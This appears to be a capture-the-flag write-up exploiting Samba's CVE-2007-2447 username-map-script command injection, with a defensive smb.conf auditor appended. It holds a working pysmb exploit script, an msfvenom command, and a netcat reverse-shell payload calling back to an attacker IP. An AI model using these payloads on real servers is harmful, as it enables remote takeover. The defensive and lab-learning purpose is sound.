Sambacry

Samba smbd 3.X-4.X

Samba 4.5.9 and earlier is vulnerable to a remote code execution vulnerability named SambaCry. CVE-2017-7494 allows remote authenticated users to upload a shared library to a writable shared folder and execute code to take control of servers that host vulnerable Samba services. The script below, however, targets CVE-2007-2447, the "username map script" command injection, which is a separate Samba bug: the client-supplied username is expanded inside a shell command, so a backticked command placed in the username gets executed by the server.

CVE-2007-2447 Script

Let's write the script in Python3. We need the pysmb library to talk SMB to the server. The exploit script needs nothing more than a single connect request, with the payload placed in the username field.

Write a simple POC:

```python
#!/usr/bin/env python3
from smb.SMBConnection import SMBConnection

# SMBConnection(username, password, my_name, remote_name): the backticked
# command in the username field is what the vulnerable server executes.
SMBConnection(
    "/=`nohup ping -c 3 10.10.14.33`",
    "",
    "",
    "",
).connect("10.10.10.3", 139)
```

Listen on tun0 with tcpdump and execute the script.


We get a ping reply, which confirms arbitrary code execution. Replace the payload with a reverse shell. Generate the shellcode for the payload with msfvenom.

```bash
msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.33 LPORT=2222 EXITFUNC=thread
```

Now replace the ping command in the Python script with the netcat reverse shell payload.

```python
#!/usr/bin/env python3
from smb.SMBConnection import SMBConnection

SMBConnection(
    "/=`nohup mkfifo /tmp/lmzf; nc 10.10.14.33 2222 0</tmp/lmzf | /bin/sh >/tmp/lmzf 2>&1; rm /tmp/lmzf`",
    "",
    "",
    "",
).connect("10.10.10.3", 139)
```

Open a netcat listener on port 2222 and execute the script.

And finally we have the Root Shell!! Lame! :)
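As an added defensive example (not code from the original post), the following Python checks for the precondition that makes CVE-2007-2447 exploitable, a `username map script` directive in smb.conf, and flags usernames carrying shell metacharacters like the backticks in the payloads above. The smb.conf contents and the usernames it is tested with are constructed samples.

```python
import re
from typing import Dict, List

def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal smb.conf parser. Samba compares parameter names
    case-insensitively and ignores internal whitespace, so keys are
    normalised the same way ("Username Map Script" -> "usernamemapscript")."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, val = line.partition("=")
            sections[current]["".join(key.lower().split())] = val.strip()
    return sections

def audit_smb_conf(text: str) -> List[str]:
    """Report the CVE-2007-2447 precondition: a [global] 'username map
    script', which smbd runs through /bin/sh with the client-supplied
    username before the client has authenticated."""
    script = parse_smb_conf(text).get("global", {}).get("usernamemapscript")
    if not script:
        return []
    return [f"username map script = {script!r}: remove it or run a Samba "
            "release that fixes CVE-2007-2447"]

# Metacharacters a legitimate SMB username never needs; the write-up's
# payload depends on backticks, so seeing them in a username is a strong
# sign of an injection attempt against this bug.
_SHELL_META = re.compile(r"[`$;|&<>]")

def is_injection_attempt(username: str) -> bool:
    return bool(_SHELL_META.search(username))

# Constructed sample smb.conf, not taken from the original post.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   Username Map Script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
   writable = yes
"""
```

Run `audit_smb_conf` over a host's real smb.conf to confirm the directive is absent, and `is_injection_attempt` over usernames seen in smbd authentication logs to spot attempts like the one this write-up shows.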
